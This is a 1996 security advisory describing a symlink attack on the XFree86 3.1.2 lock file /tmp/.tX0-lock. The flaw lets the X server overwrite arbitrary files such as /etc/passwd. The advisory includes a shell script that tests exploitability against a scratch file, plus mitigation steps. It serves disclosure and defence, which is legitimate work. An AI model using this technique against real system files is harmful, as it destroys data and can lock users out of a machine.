------------------------------------------------------------------------------ Title: PHuNC Advisory 1996 #1 - Xfree86 3.1.2 Date: 6/4/1996 Problem: Xfree86 3.1.2 contains a "bug" that can delete any file Systems: Any running Xfree86 3.1.2 Source of Hole: Anonymous Email ------------------------------------------------------------------------------ Problem: Any machines running Xfree86 servers are open to attack to a hole that can delete any file on the entire system, including /etc/passwd. The result of this can cause many problems on the system, even login failure (due to lack of /etc/passwd). Exploit: The actual exploit is based on the fact that Xfree86 3.1.2 will overwrite a file called /tmp/.tX0-lock even if it exits. Because this version does no checking to whether or not it already exists, a link called /tmp/.tX0-lock can be created pointing to any file on the system. When the X server is run, it writes to the lock file, which is actually a link, and overwrites the designated file. To make ease of exploiting this "hole", make a shell script similar to the following: --- cut here, start code exploit.sh --- #!/bin/sh echo Running exploit to check the Xfree86 3.1.2 hole! echo Creating file called /tmp/blah which will contain a few words. echo "This version is NOT exploitable!" > /tmp/blah ln -s /tmp/blah /tmp/.tX0-lock startx echo Now check /tmp/blah and if it says: echo \"This version is NOT exploitable!\" echo then the version you have is not exploitable! echo Otherwise, it should have a few numbers, then it is echo exploitable! --- cut here, end of code exploit.sh --- Fix: This hole can be fixed by a few ways. A temporary way is to let root or superuser run it only. Do this by: chmod 4700 Another way is to create a group specifically for X server, and allow trusted users to be in the group. A permanent fix would be to install the latest Xfree86 and it can be downloaded from http://www.x.org ------------------------------------------------------------------------------ If you have a bug, hole, or exploit email PHuNC at knight@catch22.com and you will receive credit as due. VENDORS: If you have your own advisories, or patch releases, please email us at knight@catch22.com as well, and we will give you credit as well. ------------------------------------------------------------------------------